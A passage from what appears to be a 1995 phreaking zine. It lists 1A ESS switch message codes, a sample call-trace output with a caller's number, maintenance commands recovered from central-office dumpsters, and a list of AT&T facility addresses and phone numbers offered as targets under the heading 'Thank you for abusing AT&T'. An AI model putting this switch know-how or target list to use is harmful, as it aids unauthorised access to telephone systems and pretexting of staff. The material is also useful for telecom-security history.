  2201. FM07  Carrier group alarm status of specific group
  2202. FM08  Carrier group alarm count for digroup
  2203. FM09  Hourly report of carrier group alarms
  2204. FM10  Public switched digital capacity failure
  2205. FM11  PUC counts of carrier group errors
  2206.  
  2207.       ** MAINTENANCE **
  2208. MA02  Status requested, print out of MACII scratch pad
  2209. MA03  Hourly report of system circuits and units in trouble
  2210. MA04  Reports condition of system
  2211. MA05  Maintenance interrupt count for last hour
  2212. MA06  Scanners,network and signal distributors in trouble
  2213. MA07  Successful switch of duplicated unit (program store etc.)
  2214. MA08  Excessive error rate of named unit
  2215. MA09  Power should not be removed from named unit
  2216. MA10  OK to remove paper
  2217. MA11  Power manually removed from unit
  2218. MA12  Power restored to unit
  2219. MA13  Indicates central control active
  2220. MA15  Hourly report of # of times interrupt recovery program acted
  2221. MA17  Centrex data link power removed
  2222. MA21  Reports action taken on MAC-REX command
  2223. MA23  4 minute report, emergency action phase triggers are inhibited
  2224.  
  2225.       ** MEMORY **
  2226. MN02  List of circuits in trouble in memory
  2227.  
  2228.       ** NETWORK TROUBLE **
  2229. NT01  Network frame unable to switch off line after fault detection
  2230. NT02  Network path trouble Trunk to Line
  2231. NT03  Network path trouble Line to Line
  2232. NT04  Network path trouble Trunk to Trunk
  2233. NT06  Hourly report of network frames made busy
  2234. NT10  Network path failed to restore
  2235.  
  2236.       ** OPERATING SYSTEM STATUS **
  2237. OP:APS-0
  2238. OP:APSTATUS
  2239. OP:CHAN
  2240. OP:CISRC     Source of critical alarm, automatic every 15 minutes
  2241. OP:CSSTATUS  Call store status
  2242. OP:DUSTATUS  Data unit status
  2243. OP:ERAPDATA  Error analysis database output
  2244. OP:INHINT    Hourly report of inhibited devices
  2245. OP:LIBSTAT   List of active library programs
  2246. OP:OOSUNITS  Units out of service
  2247. OP:PSSTATUS  Program store status
  2248.  
  2249.       ** PLANT MEASUREMENTS **
  2250. PM01  Daily report
  2251. PM02  Monthly report
  2252. PM03  Response to a request for a specific section of report
  2253. PM04  Daily summary of IC/IEC irregularities
  2254.  
  2255.       ** REPORT **
  2256. REPT:ADS FUNCTION  Reports that a ADS function is about to occur
  2257. REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned
  2258. REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned
  2259. REPT:ADS FUNCTION STATE CHANGE Change in state of ADS
  2260. REPT:ADS PROCEDURAL ERROR You fucked up
  2261. REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable
  2262. REPT:PROG CONT OFF-NORMAL System programs that are off or on
  2263. REPT:RC CENSUS Hourly report on recent changes
  2264. REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited)
  2265.  
  2266.       ** RECENT CHANGE **
  2267. RC18  RC message response
  2268.  
  2269.       ** REMOVE **
  2270. RMV   Removed from service
  2271.  
  2272.       ** RESTORE **
  2273. RST   Restored to service status
  2274.  
  2275.       ** RINGING AND TONE PLANT **
  2276. RT04  Status of monitors
  2277.  
  2278.       ** SOFTWARE AUDIT **
  2279. SA01  Call store memory audit results
  2280. SA03  Call store memory audit results
  2281.  
  2282.       ** SIGNAL IRREGULARITY **
  2283. SIG IRR  Blue box detection
  2284. SIG IRR INHIBITED  Detector off
  2285. SIG IRR TRAF  Half hour report of traffic data
  2286.  
  2287.       ** TRAFFIC CONDITION **
  2288. TC15  Reports overall traffic condition
  2289. TL02  Reason test position test was denied
  2290. TL03  Same as above
  2291.  
  2292.       ** TRUNK NETWORK **
  2293. TN01  Trunk diagnostic found trouble
  2294. TN02  Dial tone delay alarm failure
  2295. TN04  Trunk diag request from test panel
  2296. TN05  Trunk test procedural report or denials
  2297. TN06  Trunk state change
  2298. TN07  Response to a trunk type and status request
  2299. TN08  Failed incoming or outgoing call
  2300. TN09  Network relay failures
  2301. TN10  Response to TRK-LIST input, usually a request from test position
  2302. TN11  Hourly, status of trunk undergoing tests
  2303. TN16  Daily summary of precut trunk groups
  2304.  
  2305.       ** TRAFFIC OVERLOAD CONDITION **
  2306. TOC01 Serious traffic condition
  2307. TOC02 Reports status of less serious overload conditions
  2308.  
  2309.       ** TRANSLATION **  (shows class of service, calling features etc.)
  2310. TR01  Translation information, response to VFY-DN
  2311. TR03  Translation information, response to VFY-LEN
  2312. TR75  Translation information, response to VF:DNSVY
  2313.       **             **
  2314. TW02  Dump of octal contents of memory
  2315.  
  2316. Trace Output Appearance (COT - Customer Oriented Trace)
  2317. A 03 CT04 22 03 02  05 11 26  359  705 8500    <-- NUMBER CALLED
  2318.          CPN 212 382 8923                      <-- WHO CALLED
  2319.          
  2320.          01/14/95  22:03:02                    <-- TIME/DATE
  2321.          #236                                  <-- JOB NUMBER
  2322.  
  2323.  
  2324. Appendix 2 - Miscellaneous 1A Commands found on logs from CO dumpsters:
  2325. -=-=-=-=-=
  2326.  
  2327. RMV::NPC 69!
  2328. UTL::QRY.CMAP 136!
  2329. UTL::QRY.SCON to 135!        (as far out as   to 12003!)
  2330. UTL::QRY.SCON 13615/01!
  2331. UTL::QRY.ALMS!
  2332. UTL::QRY,WHO!
  2333. UTL::QRY,ALL!
  2334. UTL::QRY,FPKG!
  2335. UTL::QRY,UNIT1,FTMI1, EQL
  2336. GRTH::UNIT1!       (FT100) <-- comment written by command
  2337. GRTH::UNI1,FTMI1, EQL(L,R)     (2,2) <-- Example
  2338. UTL::QRY.!
  2339. RMV::LINK 3!
  2340. DGN::LINK 3!
  2341. RST::LINK 3!
  2342. UTL::QRY.TPS!
  2343.  
  2344. RST::TAPE!                     (This and the next two commands were 
  2345. UTL::BMTR.FROM DISK.TO TAPE!    ALWAYS found together, and are pretty
  2346. RMV::TAPE!                      obvious)
  2347.  
  2348. SDIS::FROM 11204/03.TO 11204/04!
  2349. UTL::QRY.SCON.CH.TO 11204!
  2350. UTL::QRY.CMAP.TO 11204/03!
  2351. UTL::QRY,CMAP 01117!
  2352. SCON::RATE 96.FROM 11204/03.TO 11204/4!
  2353. LOGIN::USER DAX\
  2354. UTL::EQD,NPCS!
  2355. ADD::LINK 2,NPCAD E!
  2356.  
  2357. UTL::LOC,ETSI 101!
  2358.               |_|____________Bay        (These show physical locations
  2359.                 |____________Unit        of trunks)
  2360.  
  2361. UTL::LOC,NPC 01117!
  2362.  output -    1-01-38
  2363.              |__|__|_________Bay
  2364.                 |__|_________Unit
  2365.                    |_________38(1/8) inches
  2366.  
  2367.  
  2368. Appendix 3 - Suggested reading
  2369. -=-=-=-=-=
  2370.  
  2371. Acronyms 1988 (Phrack #20, file 11)
  2372. Central Office Operations by Agent Steal (LoDTJ #4, file 4)
  2373. ESS & 1A Switching Systems by Ninja Master
  2374. The Fine Art of Telephony by Crimson Flash (Phrack #38, file 7)
  2375. Guide to 5ESS by Firm G.R.A.S.P. (Phrack #43, file 16)
  2376. Lifting Ma Bell's Cloak of Secrecy by VaxCat (Phrack #24, file 9)
  2377. Operator Services Position System by Bandito (Phun #5, file 8)
  2378. Peering Into the soul of ESS by Jack the Ripper (Phun #5, file 2)
  2379.  
  2380. __________________________________________________________________________
  2381. (C)opywrong 1995, DeadKat Inc.
  2382. All wrongs denied.
  2383.  
  2384. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo> 
  2385.  
  2386.  
  2387.  
  2388.                ▀▀▀▀▀▀▀▀▀
  2389.             ▀─────▀▀▀▀▀▀▀▀▀▀
  2390.           ▀▀────────▀▀▀▀▀▀▀▀▀▀      ┌────────────────────────────┐
  2391.          ▀▀──────────▀▀▀▀▀▀▀▀▀▀     │ Thank you for abusing AT&T │
  2392.         ▀▀───────────▀▀▀▀▀▀▀▀▀▀▀    └────────────────────────────┘
  2393.         ▀▀▀─────────▀▀▀▀▀▀▀▀▀▀▀▀               Part II
  2394.          ▀▀▀──────▀▀▀▀▀▀▀▀▀▀▀▀▀       
  2395.           ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀           by Major & Dead Kat
  2396.             ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  2397.                 ▀▀▀▀▀▀▀▀
  2398.  
  2399.  
  2400.  
  2401. Some of the "Frequently Visited AT&T Locations":
  2402.  
  2403. LOCATION                                    CITY       ST/ZIP    TELEPHONE
  2404. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~~~~~~~~  ~~~~~~~~  ~~~~~~~~~~~                     
  2405. AT&T 1 PERIMETER PARK S.                    BIRMINGHAM AL 35243  205-969-4000
  2406. BIRMINGHAM AMO 300 CHASE PK.SO., RIVERCHASE BIRMINGHAM AL 35243  205-988-9300
  2407. MONTGOMERY MMC 2855 SELMA HIGHWAY           MONTGOMERY AL 36108  205-281-6200
  2408. AT&T 3280 DAUPHIN ST., BLDG B               MOBILE     AL 36606  205-470-1000
  2409. LITTLE ROCK WORKS 7600 INTERSTATE #30       LTTL ROCK  AR 72209  501-569-4411
  2410. AT&T 10825 #2 FINANCIAL CNTR. SUITE 300     LTTL ROCK  AR 72211  501-223-1000
  2411. PHOENIX WORKS 505 N.51ST AVE                PHOENIX    AZ 85002  602-233-5000
  2412. AT&T MICROELECT. SALES 432 N. 44TH ST.      PHOENIX    AZ 85008  602-204-1100
  2413. PHOENIX CAC 3750 W. INDIAN SCHOOL RD.       PHOENIX    AZ 85019  602-269-6666
  2414. AT&T 333 S. BEAUDRY AVE.                    L.A.       CA 90017  213-481-9100
  2415. AT&T 333 S. BEAUDRY AVE.                    L.A.       CA 90017  213-482-5799
  2416. LOS ANGELES CP (SVC) 2400 YATES AVE         L.A.       CA 90040  213-726-5000
  2417. CYPRESS INNST. 6300 GATEWAY DR.             CYPRESS    CA 90630  714-220-6200
  2418. AT&T MICROELEC. SLES 6300 GATEWAY DR.       CYPRESS    CA 90630  714-220-6223
  2419. AT&T 200 NO. WESTLAKE BLVD. SUITE 103       TH.OAKS    CA 91362  805-373-9390
  2420. VANDENBURG AFB FED. SYS                     LOMPOC     CA 93437  805-866-1611
  2421. AT&T FED SYS 3201 SKYWAY DR.                SAN MONICA CA 93455  805-349-8649
  2422. AT&T 1111 E. HERNDON AVE. SUITE 31          FRESNO     CA 93710  209-449-4200
  2423. AT&T SAND HILL RD SUITE 216                 MENLO PARK CA 94025  415-324-6000
  2424. AT&T 224 AIRPORT PKWY                       SAN JOSE   CA 94086  408-452-3200
  2425. SUNNYVALE REG. CTR. 1090 E. DUANE AVE.      SUNNYVALE  CA 94086  408-522-4000
  2426. HAYWARD SVC 1288 SAN LUIS OBISPO AVE.       HAYWARD    CA 94544  415-475-5000
  2427. AT&T 4430 ROSEWOOD DR.                      PLEASANTON CA 94566  415-224-1000
  2428. AT&T 1717 DOOLITTLE DR.                     SN LEANDRO CA 94577  415-678-1000
  2429. SAN RAMON AMO BLD 2440 CAMINO RAMON         SAN RAMON  CA 94583  415-830-4300
  2430. AT&T 2201 BROADWAY                          OAKLAND    CA 94612  415-273-2800
  2431. PACIFIC REGION MMC 3301 INDUSTRIAL AVE.     ROCKLIN    CA 95677  916-645-8911
  2432. AT&T 8950 CALIFORNIA CNTR. DR.              SACRAMENTO CA 95826  916-361-4600
  2433. DENVER SVC CNTR. 11900 E. CORNELL AVE.      AURORA     CO 80014  303-368-2000
  2434. AT&T 3190 S. VAUGHN WAY                     AURORA     CO 80014  303-695-5000
  2435. AT&T BMG 6200 S. SYRACUSE WAY               ENGLEWOOD  CO 80111  303-850-7000
  2436. AT&T-NS SALES 707 17TH ST.                  DENVER     CO 80202  303-291-4001
  2437. DENVER SVC 2551 E. 40TH AVE.                DENVER     CO 80205  303-291-4200
  2438. DENVER WORKS 1200 W. 120TH AVE              DENVER     CO 80234  303-538-1200
  2439. AT&T-BL DENVER NO. 12110 PECOS ST.          WESTMNSTR  CO 80234  303-538-1813
  2440. AT&T-BL 11900 N. PECOS ST.                  DENVER     CO 80234  303-538-4011
  2441. AT&T 7979 E. TUFTS AVE.                     DENVER     CO 80237  303-290-3100
  2442. AT&T 13952 DENVER WEST PKWY.                GOLDEN     CO 80401  303-273-2000
  2443. AT&T FED SYS 6200 S. SYRACUSE WAY           ENGLEWOOD  CO 80401  303-793-8800
  2444. AT&T-NS SALES 6300 GATEWAY DR.              CYPRESS    CO 90630  714-220-6200
  2445. AT&T 8 TWO MILE RD                          FARMINGTON CT 06032  203-678-3800
  2446. ORANGE CUST. REPAIR CTR. 50 BOSTON POST RD. ORANGE     CT 06477  203-795-4721
  2447. CONNECTICUT AMO 2750 DIXWELL AVE            HAMDEN     CT 06518  203-287-4070
  2448. AT&T 777 LONGRIDGE RD                       STAMFORD   CT 06851  203-845-5600
  2449. AT&T 1825 I ST. N.W. SUITE 800              WASHINGTON DC 20006  202-429-1300
  2450. WASH-DC 1120 20TH ST.,NW                    WASHINGTON DC 20006  202-457-2000
  2451. AT&T 222 DELAWARE AVE.                      WILMINGTON DE 19801  302-888-6000
  2452. AT&T 1401 E. BELMONT ST.                    PENSACOLA  FL 32501  904-432-7454
  2453. AT&T 151 S. WYMORE RD                       ALTA SPGS. FL 32714  407-869-2200
  2454. AT&T 2301 MAITLAND CTR. PKWY.               MAITLAND   FL 32751  407-660-3200
  2455. AT&T 2400 MAITLAND CTR. PKWY.               MAITLAND   FL 32751  407-660-3200
  2456. AT&T 850 TRAFALGAR COURT                    MAITLAND   FL 32751  407-660-3200
  2457. AT&T 901 LAKE DESTINY DR.                   ORLANDO    FL 32809  407-875-4400
  2458. AT&T 8221 EXCHANGE DRIVE                    ORLANDO    FL 32809  407-850-3000
  2459. AT&T 6039 S. RIO GRANDE AVE.                ORLANDO    FL 32809  407-850-8000
  2460. AT&T MICROELECT.9333 S. JOHN YOUNG PKWY     ORLANDO    FL 32819  407-345-6000
  2461. AT&T 9701 S. JOHN YOUNG PARKWAY             ORLANDO    FL 32819  407-351-7100
  2462. AT&T 100 WEST CYPRESS CREEK                 FT. LAUD.  FL 33309  305-493-6100
  2463. ATLANTA WKS 2000 NORTHEAST EXPRESSWAY       NORCROSS   GA 30071  404-447-2000
  2464. AT&T FED SYS. 1975 LAKESIDE PKWAY           TUCKER     GA 30085  404-496-8200
  2465. AT&T MICROELECT. SALES 3295 RIVER EXCH.DR   NORCROSS   GA 30092  404-390-5000
  2466. AT&T 1200 PEACHTREE ST. NE                  ATLANTA    GA 30309  404-390-5000
  2467. ATLANTA FOC 7840 ROSEWELL RD.               ATLANTA    GA 30328  404-390-5000
  2468. ATLANTA S. CTR. 6701 ROSEWELL RD. NE.       ATLANTA    GA 30328  404-573-4000
  2469. AT&T 2970 CLAIRMONT RD. 4TH FL              ATLANTA    GA 30329  404-248-2126
  2470. ATLANTA SVC 5885 FULTON IND'L BLVD. SW.     ATLANTA    GA 30336  404-346-4000
  2471. ATL-ACCTS PAY 365 NORTHRIDGE RD.            ATLANTA    GA 30338  404-392-8900
  2472. AT&T 2800 CENTURY CTR. PKWY                 ATLANTA    GA 30345  404-320-3800
  2473. ATLANTA DATA SYS 211 PERIMETER CTR. PKWY    ATLANTA    GA 30346  404-399-0100
  2474. ATLANTA FIN.OPS MORGAN FLS ROSEWELL RD.,NE. ATLANTA    GA 30350  404-390-5000
  2475. AT&T 2300 NORTHLAKE CTR.                    TUCKER     GA 30350  404-496-8200
  2476. AT&T MMC INTERSTATE 80 & HIGHWAY 630        UNDERWOOD  IA 51519  712-566-3300
  2477. ROLLING MEADOWS 3800 GOLD RD.               ROLNG MDWS IL 60008  708-290-2000
  2478. AT&T MICROELECT. SALES 500 PARK BLVD        ITASCA     IL 60143  312-855-6300
  2479. AT&T 150 MARTINDALE RD                      SHAUMBERG  IL 60173  708-605-5000
  2480. AT&T REPAIR & SRV. CTR. 1700 HAWTHORNE LN.  W CHICAGO  IL 60185  312-293-5100
  2481. AT&T DATA SVCS 180 HANSEN CT.               WOODDALE   IL 60191  708-860-8100
  2482. AT&T FED SYS 1411 OPUS PLACE                DOWNERS GR IL 60515  708-810-4000
  2483. AT&T 1111 W. 22ND ST.                       OAKBROOK   IL 60521  708-571-5320
  2484. UIS SHOWCASE 2600 WARRENVILLE RD.           LISLE      IL 60532  708-260-7900
  2485. NWSW CTR. 2600 WARRENVILLE RD.              LISLE      IL 60532  708-510-4000
  2486. NWSW CTR. CORPORATE LAKES 2500 CABOT DRIVE  LISLE      IL 60532  708-510-4000
  2487. LISLE PS 850 WARRENVILLE RD.                LISLE      IL 60532  708-719-1005
  2488. AT&T LISLE CTR 4513 WESTERN AVE.            LISLE      IL 60532  708-810-6000
  2489. CEO-WEST 1195 SUMMER HILL DRIVE             LISLE      IL 60532  708-971-5000
  2490. MONTGOMERY WORKS 800 S. RIVER ST.           MONTGOMERY IL 60538  708-859-4000
  2491. WARRENVILLE 28W. 615 FERRY RD.              WARRENVILE IL 60555  708-393-8000
  2492. INDIAN HILL COURT 1000 E. WARRENVILLE RD.   NAPERVILLE IL 60566  708-305-3000
  2493. IH PARK-BL 200 PARK PLAZA                   NAPERVILLE IL 60567  708-979-2000
  2494. AT&T ONE S. WACKER DRIVE                    CHICAGO    IL 60606  708-592-6558
  2495. AT&T 11595 N. MERIDIAN ST.                  CARMEL     IN 46032  317-844-6674
  2496. INDIANAPOLIS INST.8700ROBERTS DR SUITE 100  FISCHERS   IN 46038  317-578-0160
  2497. INDIANA AMO N. 151 N.DELAWARE ST. SUITE565  INDIANAPOL IN 46204  317-632-9161
  2498. INDIANAPOLIS SVC (CIC) 2855 N. FRANKLIN RD. INDIANAPOL IN 46219  317-352-0011
  2499. INDIANAPOLIS HERITAGE PK 6612 E. 75TH ST.   INDIANAPOL IN 46250  317-845-8980
  2500. AT&T 404 COLUMBIA PLACE-SUITE 210           SOUTH BEND IN 46601  219-232-2000
  2501. KANSAS CITY SVC CNTR. 9501 W. 67TH ST.      MERRIAM    KS 66203  913-677-6000
  2502. AT&T 5401 COLLEGE BLVD.                     LEAWOOD    KS 66211  913-491-9840
  2503. AT&T 200 NO. BROADWAY, SUITE 400            WICHITA    KS 67202  316-269-7500 
  2504. AT&T 9300 SHELBYVILLE RD                    LOUISVILLE KY 40222  502-429-1000
  2505. AT&T 3500 N. CAUSEWAY BLVD. 10th FLOOR      METAIRIE   LA 70002  504-832-4300
  2506. AT&T 4354 S. SHERWOOD FOREST BLVD.          BATONROUGE LA 70816  504-922-6600
  2507. AT&T 3010 KNIGHT ST., SUITE 190             SHREVEPORT LA 71105  318-869-2041
  2508. SHREVEPORT WORKS 9595 MANSFIELD RD.         SHREVEPORT LA 71108  318-459-6000
  2509. AT&T 365 CADWELL DR. RM 168                 SPRINGFLD  MA 01104  413-785-4400
  2510. AT&T MICROELECT. 111 SPEEN ST.              FRAMINGHAM MA 01701  508-626-2161
  2511. ANDOVER 20 SHATTUCK RD.                     ANDOVER    MA 01810  508-691-3000
  2512. AT&T-WARD HILL 75 FOUNDATION AVE.           WARD HILL  MA 01835  508-374-5600
  2513. MERRIMACK VALLEY 1600 OSGOOD ST.            N.ANDOVER  MA 01845  508-960-2000
  2514. AT&T ACCT MGMT 800 BOYLESTON ST.            BOSTON     MA 02110  617-437-8800
  2515. AT&T-BL 800 BOYLESTON ST.                   BOSTON     MA 02110  617-437-8870
  2516. AT&T NAT'L ACCTS 100 SUMMER ST.             BOSTON     MA 02110  617-574-6000
  2517. NEW ENGLAND SVC 705 MT. AUBURN ST.          WATERTOWN  MA 02172  617-923-0765
  2518. AT&T 430 BEDFORD ST.                        LEXINGTON  MA 02173  617-863-9000
  2519. BETHESDA AMO 6410 ROCKLEDGE DR.             BETHESDA   MD 20817  301-493-2000
  2520. AT&T FED SYS 1100 WAYNE AVE                 SLVR SPGS  MD 20910  301-495-7400
  2521. COCKEYSVILLE N.S. SALES 225 SCHILLING CRCL. COCKEYVLLE MD 21030  301-584-1234
  2522. FEDERAL SYS. MD 9160 GUILFORD RD            COLUMBIA   MD 21045  301-369-7700
  2523. COULUMBIA MD 9305D GERWIG LN.               COLUMBIA   MD 21046  301-381-6150
  2524. AT&T 400 EAST PRATT ST.                     BALTIMORE  MD 21202  301-576-5700
  2525. TRANSPACIFIC COMM.,INC.1001 MCCOMAS ST.     BALTIMORE  MD 21230  301-385-0425
  2526. AT&T 136 COMMERCIAL ST., FLR 2              PORTLAND   ME 04101  207-761-1400
  2527. AT&T 26957 NORTHWESTERN HWY.                SOUTHFIELD MI 48034  313-353-6210
  2528. AT&T-NS 27777 FRANKLIN RD., SUITE 500       SOUTHFIELD MI 48034  313-355-7200
  2529. NILES MMC 2121 W. CHICAGO RD.               NILES      MI 49120  616-684-6400
  2530. AT&T 2861 CHARLEROIX, S.E.                  GRAND RPDS MI 49546  616-957-8200
  2531. AT&T 4480 W. ROUNDLAKE RD.                  ARDEN HLLS MN 55112  612-633-4803
  2532. MINNEAPOLIS SC 2230 COUNTY RD. H2           MOUNDSVIEW MN 55112  612-780-7750
  2533. AT&T 420 THIRD AVE. S., RM 670              MINEAPOLIS MN 55415  612-626-9300
  2534. AT&T MICROELECT. SALES W 82ND ST            BLOOMINGTN MN 55431  612-885-4600
  2535. BALLWIN 1111 WOODS MILL RD.                 BALLWIN    MO 63011  314-891-2000
  2536. ST.LOUIS-NS 701 MARKET ST. SUITE 900        ST. LOUIS  MO 63101  314-891-5000
  2537. AT&T 400 S. WOODS MILL RD.                  CHSTRFLD   MO 63107  314-275-1400
  2538. AT&T 424 S. WOODS MILL RD.                  CHSTRFLD   MO 63107  314-469-2500
  2539. KANSAS CITY WORKS 777 N. BLUE PKWY          LEESSUMMIT MO 64063  816-251-4000
  2540. KANSAS CITY AMO 1100 WALNUT ST.             KANSASCITY MO 64141  816-654-4000
  2541. NC WORKS 3300 LEXINGTON RD. S.E.            WIN-SALEM  NC 27102  919-784-1110
  2542. REYNOLDA RD. (DDO) 2400 REYNOLDA RD.        WIN-SALEM  NC 27106  919-727-3100
  2543. BURLINGOTN NC 204 GRAHAM-HOPEDALE RD.       BURLINGTON NC 27215  919-228-3000
  2544. GUILFORD CTR. I-85 MT HOPE CHURCH RD.       MCLEANSVLE NC 27301  919-279-7000
  2545. NS 1701 PINECROFT RD.                       GREENSBORO NC 27407  919-855-2775
  2546. AT&T 7031 ALBERT PICK RD., SUITE 300        GREENSBORO NC 27409  919-668-1800
  2547. AT&T ENGR. 3330 W. FRIENDLY AVE.            GREENSBORO NC 27410  919-379-5301
  2548. AT&T MICROELECT. SALES 5400 GLENWOOD RD.    RALEIGH    NC 27612  919-881-8023
  2549. AT&T 6701-A NORTHPARK BLVD.                 CHARLOTTE  NC 28216  704-597-3050
  2550. AT&T 2 CENTRAL PARK PLAZA                   OMAHA      NE 68102  402-595-5001
  2551. OMAHA AMO 222 S. 15th.ST, SUITE 200 S.      OMAHA      NE 68124  402-595-5001
  2552. OMAHA WORKS 120 & 1 ST                      OMAHA      NE 68137  402-691-3000
  2553. AT&T 10843 OLD MILL RD                      OMAHA      NE 68154  402-334-6000
  2554. AT&T 4 BEDFORD FARMS                        BEDFORD    NH 03102  603-623-6100
  2555. SIMPLEX WIRE (TYCO LABS) 2073 WOODBURY AVE. NEWINGTON  NH 03801  603-436-6100
  2556. PARSIPPANY 260 CHERRY HILL RD.              PARSIPPANY NJ 07054  201-299-3000
  2557. PARSIPPANY 4 WOOD HOLLOW RD.                PARSIPPANY NJ 07054  201-428-7700
  2558. PARSIPPANY CP 5 WOOD HOLLOW RD.             PARSIPPANY NJ 07054  201-581-3000
  2559. AT&T 99 JEFFERSON RD. WOODHOLLOW III        PARSIPPANY NJ 07054  201-581-5600
  2560. AT&T 4 CAMPUS DRIVE                         PARSIPPANY NJ 07054  201-829-1000
  2561. AT&T 700 LANIDEX PLAZA                      PARSIPPANY NJ 07054  201-884-7000
  2562. AT&T 1515 RTE 10                            PARSIPPANY NJ 07054  201-993-4200
  2563. LIBERTY CORNER 184 LIBERTY CORNER RD        WARREN     NJ 07060  201-580-4000
  2564. AT&T-BL WARREN SRVC. CTR. 5 REINMAN RD.     WARREN     NJ 07060  201-756-1527
  2565. CLARK SHOPS 100 TERMINAL AVE.               CLARK      NJ 07066  201-396-4000
  2566. SHORT HILLS BELL LABS 101 JFK PKWY          SHORTHILLS NJ 07078  201-564-2000
  2567. AT&T 5000 HADLEY RD                         SO.PLNFLD  NJ 07080  201-668-3200
  2568. QUALITY MGMT ENGIN. 650 LIBERTY AVE.        UNION      NJ 07083  201-851-3333
  2569. AT&T 1480 ROUTE 9 N.                        WOODBRIDGE NJ 07095  201-750-3100
  2570. TWO GATEWAY CTR.                            NEWARK     NJ 07102  201-468-6000
  2571. FREEHOLD AT&T JUNIPER PLAZA RT.9            FREEHOLD   NJ 07728  201-577-5000
  2572. AT&T-BL CRAWFORD HILL KEYPORT RD.           HOLMDEL    NJ 07733  201-888-7000
  2573. AT&T-BL CRAWFORDS CORNER RD                 HOLDMEL    NJ 07733  201-957-2000
  2574. AT&T 307 MIDDLETOWN-LINCROFT RD.            LINCROFT   NJ 07738  201-576-4000
  2575. RED HILL-BL 480 RED HILL RD                 MIDDLETOWN NJ 07748  201-949-3000
  2576. AT&T 200 LAUREL AVE                         MIDDLETOWN NJ 07748  201-957-2000
  2577. W. LONG BRANCH 185 MONMOUTH PKWY            W.LG.BRNCH NJ 07764  201-870-7000
  2578. SUMMIT 190 RIVER RD.                        SUMMIT     NJ 07901  201-522-6555
  2579. AT&T 233 MT. AIRY RD                        BSK RDGE   NJ 07920  201-204-4000
  2580. AT&T 188 MT. AIRY RD                        BSK RDGE   NJ 07920  201-221-2000
  2581. BASKING RIDGE 295 NO. MAPLE AVE.            BSK RDGE   NJ 07920  201-221-2000
  2582. AT&T 131 MORRISTOWN RD                      BSK RDGE   NJ 07920  201-953-3900
  2583. AT&T RMC 222 MT. AIRY RD                    BSK RDGE   NJ 07920  201-953-5300
  2584. AT&T INTNAT'L MT. KEMBLE AVE                BSK RDGE   NJ 07920  201-953-7000
  2585. AT&T-COMM. TR. 202-206N.                    BEDMINSTER NJ 07921  201-234-4000
  2586. BERKELEY HEIGHTS 1 OAK WAY                  BRKLY HGTS NJ 07922  201-771-2000
  2587. BERKELEY HEIGHTS 2 OAK WAY                  BRKLY HGTS NJ 07922  201-771-2000
  2588. BERNARDSVILLE 4 ESSEX AVE                   BERNARDSVL NJ 07924  201-204-2701
  2589. AT&T-BL NORTH RD                            CHESTER    NJ 07930  201-879-3400
  2590. MT. KEMBLE PLAZA 340 RTE. 202 S.            MORRISTOWN NJ 07960  201-326-2000
  2591. AT&T CAPITAL CORP. 44 WHIPPANY RD.          MORRISTOWN NJ 07960  201-397-3000
  2592. MORRISTOWN AMO 111 MADISON AVE.             MORRISTOWN NJ 07960  201-631-3700
  2593. AT&T 412 MOUNT KEMBLE AVE.                  MORRISTOWN NJ 07960  201-644-6000
  2594. AT&T 60 COLUMBIA TRNPK                      MORRISTOWN NJ 07960  201-829-7200
  2595. MORRIS BELL LABS 25 LINDSLEY DR.            MORRISTOWN NJ 07960  201-898-1000
  2596. AT&T 1 SPEEDWELL AVE.                       MORRISTOWN NJ 07960  201-898-2000
  2597. AT&T 1776 ON THE GREEN                      MORRISTOWN NJ 07960  201-898-6000
  2598. AT&T 100 SOUTHGATE PARKWAY                  MORRISTOWN NJ 07960  201-898-8000
  2599. SOUTH GATE 475 SOUTH ST.                    MORRISTOWN NJ 07962  201-606-2000
  2600. MURRAY HILL 600 MOUNTAIN AVE.               MURRAYHILL NJ 07974  201-582-3000
  2601. AT&T-T 40 MOUNTAIN AVE.                     MURRAYHILL NJ 07974  201-665-7000
  2602. WHIPPANY BELL LABS WHIPPANY RD              WHIPPANY   NJ 07981  201-386-3000
  2603. PENNSAUKEN SUP. 1077 THOM. BUSH MEM. HWY    PENNSAUKEN NJ 08110  609-488-9020
  2604. HOPEWELL-ERC CARTER RD.                     HPWL TNSHP NJ 08525  609-639-1234
  2605. HOPEWELL-CEC CARTER RD.                     HPWL TNSHP NJ 08525  609-639-4500
  2606. AT&T 29-C EMMONS DRIVE                      PRINCETON  NJ 08540  609-987-3000
  2607. LAWRENCEVILLE-CEC 3131 PRINCETON OFC PK     LRNCVLLE   NJ 08648  609-896-4000
  2608. AT&T COMM (IMS) 1300 WHITE HOUSE            TRENTON    NJ 08690  609-581-1000
  2609. AT&T 745 RT 202/206N                        BRIDGEWATR NJ 08807  201-231-6000
  2610. AT&T 95 CORPORATE DR.                       BRIDGEWATR NJ 08807  201-658-5000
  2611. AT&T MARKTG CTR 55 CORPORATE DR.            BRIDGEWATR NJ 08807  201-658-6000
  2612. AT&T 485 U.S. ROUTE 1 S., PKWY TOWERS       ISELIN     NJ 08830  201-855-8000
  2613. AT&T 80 NORTHFIELD AVE.                     EDISON     NJ 08837  201-225-8700
  2614. AT&T 20 KNIGHTSBRIDGE RD                    PISCATAWAY NJ 08854  201-457-1028
  2615. AT&T 30 KNIGHTSBRIDGE RD                    PISCATAWAY NJ 08854  201-457-2000
  2616. AT&T 180 CENTENNIAL AVE.                    PISCATAWAY NJ 08854  201-457-6000
  2617. AT&T CORP ED. 140 CENTENNIAL AVE.           PISCATAWAY NJ 08854  201-457-7000
  2618. AT&T 371 HOES LN.                           PISCATAWAY NJ 08854  201-463-2200
  2619. AT&T 242 OLD NEW BRUNSWICK RD               PISCATAWAY NJ 08854  201-562-6900
  2620. AT&T 100 ATRIUM WAY                         SOMERSET   NJ 08873  201-560-1300
  2621. AT&T PIXEL MACHINES 1 EXEC.DR.              SOMERSET   NJ 08873  201-563-2200
  2622. HOLMDEL-BL CRAWFORDS CORNER RD              HOLMDEL    NJ 07733  201-949-3000
  2623. AT&T 1001 MENAUL BLVD. N.E. B345            ALBUQURQUE NM 87107  505-761-6300
